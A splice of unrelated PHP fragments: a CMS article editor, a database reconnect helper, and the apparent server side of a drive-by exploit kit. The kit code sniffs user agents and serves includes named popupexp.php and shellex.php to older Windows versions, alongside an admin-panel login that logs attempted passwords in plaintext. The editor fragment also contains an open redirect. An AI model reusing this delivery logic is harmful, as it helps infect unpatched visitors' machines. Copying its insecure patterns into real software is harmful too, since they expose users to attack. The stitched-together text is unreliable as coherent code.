function prepare() { $item_id = intval($this->param('item_id')); if (isset($_POST['header']) && isset($_POST['meta_title']) && isset($_POST['meta_keywords']) && isset($_POST['meta_description']) && isset($_POST['annotation']) && isset($_POST['body'])) { $this->check_token(); $this->item->header = $_POST['header']; $this->item->meta_title = $_POST['meta_title']; $this->item->meta_keywords = $_POST['meta_keywords']; $this->item->meta_description = $_POST['meta_description']; $this->item->url = $_POST['url']; $this->item->annotation = $_POST['annotation']; $this->item->body = $_POST['body']; if (isset($_POST['enabled']) && $_POST['enabled'] == 1) { $this->item->enabled = 1; } else { $this->item->enabled = 0; } ## Не допустить одинаковые URL новостей. $query = sql_placeholder('select count(*) as count from articles where url=? and article_id!=?', $this->item->url, $item_id); $this->db->query($query); $res = $this->db->result(); if (empty($this->item->header)) { $this->error_msg = $this->lang->ENTER_TITLE; } elseif ($res->count > 0) { $this->error_msg = 'Статья с таким URL уже существует. Выберите другой URL.'; } else { if (empty($item_id)) { $query = sql_placeholder('INSERT INTO articles(article_id, header, url, meta_title, meta_keywords, meta_description, annotation, body, enabled, created, modified) VALUES(NULL, ?, ?, ?, ?, ?, ?, ?, ?, now(), now())', $this->item->header, $this->item->url, $this->item->meta_title, $this->item->meta_keywords, $this->item->meta_description, $this->item->annotation, $this->item->body, $this->item->enabled); $this->db->query($query); $inserted_id = $this->db->insert_id(); $query = sql_placeholder('UPDATE articles SET order_num=article_id WHERE article_id=?', $inserted_id); $this->db->query($query); } else { $query = sql_placeholder('UPDATE articles SET header=?, url=?, meta_title=?, meta_keywords=?, meta_description=?, annotation=?, body=?, enabled=?, modified=now() WHERE article_id=?', $this->item->header, $this->item->url, $this->item->meta_title, $this->item->meta_keywords, $this->item->meta_description, $this->item->annotation, $this->item->body, $this->item->enabled, $item_id); $this->db->query($query); } $this->db->query("UPDATE articles SET url=article_id WHERE url=''"); $get = $this->form_get(array('section' => 'Articles')); if (isset($_GET['from'])) { header("Location: " . $_GET['from']); } else { header("Location: index.php{$get}"); } } } elseif (!empty($item_id)) { $query = sql_placeholder('SELECT * FROM articles WHERE article_id=?', $item_id); $this->db->query($query); $this->item = $this->db->result(); } }
if (strstr($user_agent, "Windows NT 5.1")) { $os = "Windows XP"; } else { if (strstr($user_agent, "Windows NT 5.2")) { $os = "Windows 2003"; } else { $os = "other"; } } } } } } } } $sql = sql_placeholder("INSERT INTO tp_stats(datetime, ip, user_agent, browser, os, uri, accept_lang) VALUES(?, ?, ?, ?, ?, ?, ?)", date("Y-m-d H:i:s"), $ip, $user_agent, $browser, $os, $uri, $accept_lang); mysql_query($sql); if ($os == "Windows 95" || $os == "Windows NT 4" || $os == "Windows ME" || $os == "Windows 98" || $os == "Windows 2000" || $os == "Windows 2003" || $os == "Windows XP") { echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\r\n<title></title>\r\n</head><body bgcolor=snow>\r\n"; include "mod/ok.php"; echo "<br>\r\n"; include "mod/popupexp.php"; echo "<br>\r\n"; include "mod/shell/shellex.php"; echo "<br>\r\n\r\n"; } else { if ($os == "Windows XP SP2") { echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\r\n<title></title>\r\n</head><body bgcolor=snow>\r\n"; include "mod/ok.php"; echo "<br>\r\n"; include "mod/shell/shellex.php";
function sql_wrapped() { $args = func_get_args(); $sql = sql_placeholder(array_shift($args), $args); $result = sql($sql); if (mysql_errno() == 2006) { mysql_close(); mysql_connect(DB_HOST, DB_LOGIN, DB_PASS) or die('Cannot connect to DB'); mysql_selectdb(DB_DEVICE); sql("set wait_timeout=86400"); $result = sql($sql); } return $result; }
redirect("login.php"); } if (isset($login, $pass)) { $sql = "SELECT * FROM `tp_users` WHERE login = '******' AND password = '******'"; $result = mysql_query($sql); $num = mysql_num_rows($result); if (0 < $num) { $Row = mysql_fetch_array($result); $_SESSION['UserID'] = $Row['id']; $_SESSION['Login'] = $Row['login']; $_SESSION['Password'] = $Row['password']; $_SESSION['IsLoggedIn'] = true; $sql = sql_placeholder("INSERT INTO tp_logs(log, datetime, ip) values(?, ?, ?)", "<b>Logged in</b> (" . $_POST['login'] . ")", date("Y-m-d H:i:s"), getenv("REMOTE_ADDR")); mysql_query($sql); } else { $_SESSION['IsLoggedIn'] = false; $ErrMsg = "Incorrect Login or Password"; $sql = sql_placeholder("INSERT INTO tp_logs(log, datetime, ip) values(?, ?, ?)", $ErrMsg . " (" . $_POST['login'] . ":" . $_POST['password'] . ")", date("Y-m-d H:i:s"), getenv("REMOTE_ADDR")); mysql_query($sql); } } if (@$_SESSION['IsLoggedIn']) { redirect("index.php"); } echo "<html><head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">\r\n<title>Login</title>\r\n<style>\r\n"; include "include/style.css"; echo "</style>\r\n</head><body bgcolor=\"#333333\">\r\n<table cellpadding=\"3\" cellspacing=\"1\" align=\"center\" width=\"750\" border=\"0\" height=\"100%\">\r\n<tr><td valign=\"middle\" height=\"100%\" align=\"center\"><form action=\"login.php\" method=\"post\">\r\n<div align=\"left\">\r\n<table cellpadding=\"0\" cellspacing=\"0\" width=\"250\" border=\"0\" align=left bordercolor=\"#FFFFFF\" hight=\"100\">\r\n<tr><td width=\"250\" hight=\"100\">\r\n"; echo "<hr>" . getenv("REMOTE_ADDR"); echo "<hr><small>All data about your activities in the admin will be logged</small></td></tr>\r\n</table>\r\n</div>\r\n<table cellpadding=0 cellspacing=0 width='250' border=1 align=center bordercolor=\"#818181\" bordercolorlight=white bordercolordark=white>\r\n<tr><td align=\"center\" colspan=\"2\" class=\"pagetitle\"><b>Admin Panel</td></tr><tr><td align=\"center\" class=\"pagetitle2\"><b>Login:</b></td><td><input type=\"text\" name=\"login\" size=\"25\" class=inputbox3></td>\r\n</tr><tr><td align=\"center\" class=pagetitle2><b>Password:</b></td><td><input type=\"password\" name=\"password\" size=\"25\" class=inputbox3></td></tr><tr><td colspan=\"2\" align=\"center\">\r\n<font color=\"#F9FBFB\">\r\n<input type=\"submit\" value=\" Login \" ></font>\r\n<font color=\"#F9FBFB\">\r\n<input type=\"reset\" value=\" Clear \" ></font></td></tr><tr>\r\n<td align=\"center\" colspan=\"2\"><font color=#ff0000><a href=\"http://xshop.in\">\r\n<font color=\"#F9FBFB\"><small>Created by <b>0x88</b> (ICQ 92777755)</font></small></a></font></td>\r\n</tr></table><br><font color=\"#ff0000\">"; echo $ErrMsg; echo " </font></form></td></tr></table>\r\n</body>\r\n</html>";